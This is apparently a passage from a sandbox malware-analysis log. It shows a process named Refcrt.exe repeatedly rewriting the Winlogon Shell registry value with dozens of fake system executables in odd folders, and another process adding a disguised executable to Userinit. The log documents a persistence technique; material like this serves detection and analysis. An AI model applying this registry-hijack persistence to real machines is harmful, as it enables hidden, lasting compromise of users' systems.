= "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\", \"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\AppData\\Roaming\\xdwdSublime Text.exe" sddsfsdf.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", 